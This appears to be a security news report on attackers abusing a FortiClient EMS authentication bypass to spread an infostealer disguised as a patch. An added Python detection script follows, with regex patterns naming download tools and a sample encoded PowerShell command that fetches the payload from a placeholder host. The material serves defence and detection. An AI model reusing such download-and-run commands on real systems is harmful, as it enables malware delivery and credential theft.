Exploiting a Critical Server Flaw
Threat actors have been observed exploiting a critical vulnerability in FortiClient Endpoint Management Server (EMS) to distribute credential-stealing malware. The flaw, which carries a severity score of 9.1, allows an attacker to bypass authentication before an API call is made. This grants unauthorized access and enables privilege escalation on vulnerable servers. Fortinet addressed the issue in version 7.4.7 and later releases of FortiClient EMS.
Once the server is compromised, attackers modify configuration settings to delay firmware upgrade reminders. They also alter Remote Access Profile configurations and endpoint policies. This manipulation allows them to inject a malicious script that executes on managed endpoint devices. The attack was detected by Arctic Wolf in May 2026.
Infection Spread Through Legitimate Tools
The campaign leverages FortiClient’s own management pathway to push malicious PowerShell commands to managed endpoints, so the activity resembles a normal administrative operation. The attackers use a legitimate FortiClient executable, fortitray.exe, to launch a script that triggers a Base64-encoded PowerShell command. That command downloads a payload named FortiEndpoint_Patch.exe, which appears to be a genuine update but is actually an information stealer.
The malware, identified as EKZ Infostealer, harvests sensitive data including passwords, cookies, and autofill information. The stolen data is then exfiltrated to a remote server via an HTTP request. Because the attack uses the EMS management infrastructure itself, every managed endpoint becomes a potential target without requiring a separate intrusion path to each device.
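The chain described above leaves a distinctive process-creation pattern on the endpoint: a PowerShell process whose parent is fortitray.exe, carrying an encoded command that decodes to a download of FortiEndpoint_Patch.exe. The following detection script is an added example, not code from the article or from Arctic Wolf or Fortinet. It assumes a simplified Sysmon-style event shape (fields ParentImage, Image, CommandLine) and constructs its own sample events inline; the URL in the sample is a placeholder, not an indicator from the incident.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Lure file name reported in the article; everything else below is constructed.
PAYLOAD_NAME = "FortiEndpoint_Patch.exe"

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Common PowerShell download primitives; matched against the *decoded* command.
DOWNLOAD_PATTERNS = re.compile(
    r"(invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|\biwr\b|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand argument; None if it is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    event_id: int
    reasons: List[str]


def analyze(event: Dict[str, object]) -> Optional[Finding]:
    """Score one process-creation event; return a Finding only for the suspicious combination."""
    reasons: List[str] = []
    parent = str(event.get("ParentImage", "")).lower()
    image = str(event.get("Image", "")).lower()
    cmdline = str(event.get("CommandLine", ""))

    is_powershell = image.endswith(("powershell.exe", "pwsh.exe"))
    from_fortitray = is_powershell and parent.endswith("fortitray.exe")
    if from_fortitray:
        reasons.append("powershell spawned by fortitray.exe")

    m = ENCODED_FLAG.search(cmdline)
    decoded = decode_ps(m.group(1)) if m else None
    if m:
        reasons.append("encoded PowerShell command")

    # Inspect the decoded script when there is one, otherwise the raw command line.
    text = decoded if decoded is not None else cmdline
    if DOWNLOAD_PATTERNS.search(text):
        reasons.append("download primitive in command")
    if PAYLOAD_NAME.lower() in text.lower():
        reasons.append("references " + PAYLOAD_NAME)

    # An encoded command or a download on its own is routine admin noise;
    # the fortitray.exe parent, or two or more indicators together, is what we alert on.
    if from_fortitray or len(reasons) >= 2:
        return Finding(int(event["EventId"]), reasons)
    return None


def run(events: List[Dict[str, object]]) -> List[Finding]:
    """Run the detector over a batch of events and keep only the findings."""
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample telemetry (hypothetical hosts, placeholder URL).
_SUSPICIOUS_SCRIPT = (
    "Invoke-WebRequest -Uri http://example.invalid/" + PAYLOAD_NAME
    + " -OutFile $env:TEMP\\" + PAYLOAD_NAME
)
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventId": 1, "ParentImage": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + encode_ps(_SUSPICIOUS_SCRIPT)},
    {"EventId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"EventId": 3, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + encode_ps("Get-Date")},
]

if __name__ == "__main__":
    for finding in run(SAMPLE_EVENTS):
        print(finding.event_id, "->", "; ".join(finding.reasons))
```

Only event 1 is reported; the scheduled-task style encoded command in event 3 is deliberately left alone so the rule does not page on every encoded invocation. In a real deployment the parent-process check is the durable part of this logic, because the payload name and download cmdlet are trivially changed by the operator.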
Source: The Hacker News